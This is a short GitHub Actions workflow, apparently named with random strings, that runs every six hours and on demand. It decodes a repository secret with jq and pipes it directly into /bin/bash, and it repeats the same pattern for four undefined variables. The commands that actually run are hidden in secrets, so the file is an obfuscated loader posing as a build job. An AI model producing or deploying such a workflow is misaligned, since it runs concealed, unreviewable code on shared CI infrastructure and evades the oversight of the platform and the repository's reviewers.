name: gonghanlu6721

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gonghanlu6721
        env:
          l771: ${{ secrets.l771 }}
        run: |
          echo $l771 | jq -r .uzs905 | /bin/bash
          echo $mqas799 | jq -r .utlz4 | /bin/bash
          echo $zmbqg8104 | jq -r .vbm287 | /bin/bash
          echo $dzw027 | jq -r .ssu69607 | /bin/bash
          echo $nj6 | jq -r .mgl66 | /bin/bash

